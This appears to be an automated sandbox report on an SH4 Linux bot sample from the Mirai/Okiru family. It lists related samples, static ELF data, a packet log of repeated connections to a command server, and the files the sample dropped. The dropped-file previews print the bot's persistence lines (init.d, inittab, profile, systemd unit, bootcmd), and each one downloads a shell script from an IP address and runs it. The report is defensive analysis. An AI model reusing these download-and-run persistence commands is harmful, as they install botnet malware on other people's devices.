	armv4eb.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	tftp.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
NETIXBG	arm.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/sh4.nn.elf	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.657720481046131
Encrypted:	false
SSDEEP:	3:KPJRXKhiFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRKkfoYZX48bbaaeXCO
MD5:	352020393577339317EBEE4AED36F8BF
SHA1:	CED68ED5C7986138611DD30CC41136CE80F3E397
SHA-256:	B5859A5BF22F0AB879821E4C2C3F95B6A9FC8B229CDE4BEEA07C465C77913A17
SHA-512:	7B247718835A753C6C02D331CBB5DE5FE62D7BFBA213A769F3197A962060089FAD6FB2AD0B07E6C605BF04C2B536FCDD3DA333521691D1103DDF51C9508CF131
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh4.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.526047213035463
Encrypted:	false
SSDEEP:	12:QRk/XNxaN2PUJgjvMUFRuKN+dRRucSOyd3:+McIJoYOM3
MD5:	F48DD17432FBE95CA55B2C0006BC9046
SHA1:	5DF733C513CD723F1FA28F3FDE4A27DE2A97E369
SHA-256:	E67B8F595AA3FC551DA51B8971C7294872E6598D9AF61B9F42BF8AF3090D47C0
SHA-512:	81D29DA5DFCF71D13527174BE03BE8C898BC181E2B6A4F67A2D40DFA017C28C7B542370EEB58D87B0A3BC44FB9FE69923020DEA3D6BBB3D94E5FA15758FA204B
Malicious:	true
Joe Sandbox View:	Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh4.nn.elf..case "" in. start). echo 'Starting sh4.nn.elf'. /tmp/sh4.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh4.nn.elf'. killall sh4.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.627354501209226
Encrypted:	false
SSDEEP:	3:TKH4vZKKhiFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8KkzSXoZX48bzBeLXE0
MD5:	4E8B86A572F983DC08ABDF82E6E12267
SHA1:	67E681B9BF8F26DB26BD4E53575759CB0BD8BCED
SHA-256:	B2D48476DA5C2307C68F833F5E1DDBD62DA6071705C0E28A0B538562F22D34A9
SHA-512:	BC4B612279B03060507571882368A5917FA67045202B2AFAA1782002F3DF324ED8F381D73A833C6FEBBC90B1B279F301B03F755845CE15F83C44D0DB33F9E88C
Malicious:	true
Joe Sandbox View:	Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.583391244844054
Encrypted:	false
SSDEEP:	3:nAWu5IhiFDDoCvLdjX48FIbILbaaFOdFXa5O:AykfoYZX48bbaaeXCO
MD5:	E1166D45D9ED40EB21A7C591F90E419A
SHA1:	DB52F95035ABA87D7CCC4B29E018F28B04EC8067
SHA-256:	BCEB01F80A4F323C56443FC1D08377DB9CE32925668A525A5439B122C9BE4231
SHA-512:	8808997CB246238C3675779D03313C5024E281279E68A8D13651DE64DBDA4EA12802FE1DC0182535FEB9D24EA0BA776E25800D468AF962041606C67043ED5824
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.472384332378184
Encrypted:	false
SSDEEP:	3:TgKhiFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgKkzSXoZX48bbaaeXC0
MD5:	47195CB470ACF6E4B1DBE72664993713
SHA1:	4C26B6C09CC2E0D88BDCDF721A224BBAD50688E6
SHA-256:	6EC6B33455644B4BEA142834F4BD6724BE0342BB00C9CAF297FB7DB7C02CE22B
SHA-512:	CF55F81BCABB132E69D2819EAE38F53970DF225E75C19C93CAB795C3ECDCDB0F79204A04850DA166EBB1E3B96CEAD019DBA8AAFF894C33142EC21F7BC0C139C5
Malicious:	true
Preview:	/tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.0656991431492315
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+mO02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+Vp+GWRdtd+GWRXY+GWRuL6
MD5:	59A513CC72AFDE3E897F4C5CDD4DAE49
SHA1:	5CF03D24C8D60A234A71C2DC66DA5273576D1CE3
SHA-256:	AA0631BA912510F7837087EF3C7F2E97D3976D6D2FAC18993C2C30659AFC95F2
SHA-512:	7EB7FFA69570D78ECBCBF11AC81B9667380CA98D72DB40A3F04D0AB17AB24915114A7B6A6A603BCA4D297E515FB64E167FB40445C76E0791085BDEF7FF176258
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/sh4.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.X9LbXv (deleted)

Download File

Process:	/tmp/sh4.nn.elf
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.625
Encrypted:	false
SSDEEP:	3:TgKhiln:TgKEn
MD5:	AA13A1788DEE62AD7B81E381463BF8D7
SHA1:	0E21290B03BAD90EC3B1D5638F84929E822F6AAE
SHA-256:	53D5AB596D45FDDA9C031F87D2CC18EEBF3710689256F65DA7577E20EB59AEEA
SHA-512:	3E78B3236C5696912F507060451E200251009DB6DF3D5CE0CDD4F1108FB600A3FB768C811ED6700D48890651DE1B6A7507AC311F2BAC717C3E9B333BA94E0140
Malicious:	false
Preview:	/tmp/sh4.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.947541917630187
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	sh4.nn.elf
File size:	81'276 bytes
MD5:	d777594dc50b802dbfd3490e1c765795
SHA1:	90244b7951fa3e6409885edaacf6d1692c47e668
SHA256:	0c462c6fa35031cbb936f59e7e53c3e40bd3aec80cb8af1ecddc53778063c351
SHA512:	b41c027f2054d1dcb793d3484cf1bcef13727a1e6c0573ffe57d05d868062e616ef7faa2c86ce487ed907bb17adb8edfb93dbec68aff2a9b5aea77ef55d91deb
SSDEEP:	1536:j6G4kXEwsfwjPofLaJlKVrrP7CoseHCyWh2PFo:lhkgsV/rseHywFo
TLSH:	4583BE72C8756D14D04805B4B5B28F746B53F940E95B2FF699AAC63A8003E9CF70A7F4
File Content Preview:	.ELF.....................@.4....;......4. ...(...............@...@..6...6...............6...6B..6B......&..........Q.td............................././"O.n........#.@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	80836
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x110e0	0x0	0x6	AX	32
.fini	PROGBITS	0x4111c0	0x111c0	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x4111e4	0x111e4	0x24bc	0x0	0x2	A	4
.ctors	PROGBITS	0x4236a4	0x136a4	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x4236ac	0x136ac	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x4236b8	0x136b8	0x4b8	0x0	0x3	WA	4
.got	PROGBITS	0x423b70	0x13b70	0x10	0x4	0x3	WA	4
.bss	NOBITS	0x423b80	0x13b80	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x13b80	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x136a0	0x136a0	6.9781	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x136a4	0x4236a4	0x4236a4	0x4dc	0x26f0	4.6322	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 05:42:50.764097929 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:50.883893013 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:50.883979082 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:50.884363890 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:51.004591942 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:51.429090023 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:51.474237919 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:42:51.794188976 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:51.802093983 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:51.914340973 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:52.006087065 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:52.006150007 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:52.435863018 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:52.555519104 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:52.555620909 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:52.555620909 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:52.676193953 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:53.072278023 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:53.234030008 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:53.674122095 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:53.674200058 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:54.075520039 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:54.195342064 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:54.196516991 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:54.196563959 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:54.316224098 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:54.764564037 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:54.926093102 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:55.343065023 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:55.343146086 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:55.765918016 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:55.885912895 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:55.885976076 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:55.885999918 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:56.005637884 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:56.460577965 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:56.622263908 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:57.012502909 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:57.012568951 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:57.105468988 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 05:42:57.495909929 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:57.616871119 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:57.616942883 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:57.616970062 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:57.736505032 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:58.122594118 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:58.289977074 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:58.642210007 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 05:42:58.739898920 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:58.739989042 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:59.124186039 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:59.243944883 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:59.244013071 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:59.244060040 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:59.363702059 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:42:59.750308990 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:42:59.910060883 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:00.365333080 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:00.365422964 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:00.751483917 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:00.871161938 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:00.871434927 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:00.871434927 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:00.991180897 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:01.375926971 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:01.542048931 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:01.986602068 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:01.986685038 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:02.376754045 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:02.496483088 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:02.496566057 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:02.496593952 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:02.616329908 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:02.999300003 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:03.166059971 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:03.635186911 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:03.635279894 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:04.003062963 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:04.122858047 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:04.122944117 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:04.123008966 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:04.242650032 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:04.628468990 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:04.793994904 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:05.247956991 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:05.248034954 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:05.629451990 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:05.749161959 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:05.749264956 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:05.749295950 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:05.868892908 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:06.252785921 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:06.414004087 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:06.872777939 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:06.872973919 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:07.254029036 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:07.373719931 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:07.373796940 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:07.373837948 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:07.493386030 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:07.877630949 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:08.038125992 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:08.492993116 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:08.493089914 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:08.878597975 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:09.394062042 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:09.394328117 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:09.394328117 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:09.514019012 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:09.897568941 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:10.062016010 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:10.512356043 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:10.512603045 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:10.898369074 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:11.018073082 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:11.018369913 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:11.018390894 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:11.138196945 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:11.521523952 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:11.682180882 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:11.951400042 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:43:12.150357962 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:12.150518894 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:12.529534101 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:12.649154902 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:12.649260044 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:12.649316072 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:12.768990040 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:13.154109955 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:13.322037935 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:13.773673058 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:13.773808956 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:14.155124903 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:14.274873018 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:14.275119066 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:14.275300026 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:14.394989014 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:14.781995058 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:14.946078062 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:15.394784927 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:15.394908905 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:15.783121109 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:15.902869940 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:15.902956963 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:15.902998924 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:16.022505999 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:16.406923056 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:16.570369005 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:17.021866083 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:17.022342920 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:17.407821894 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:17.527503967 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:17.527578115 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:17.527710915 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:17.647424936 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:18.031332970 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:18.194031954 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:19.032573938 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:19.152522087 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:19.152654886 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:19.152720928 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:19.272222042 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:19.656862020 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:19.817977905 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:20.276225090 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:20.276285887 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:20.657891989 CET	60044	38242	192.168.2.23	94.156.227.234
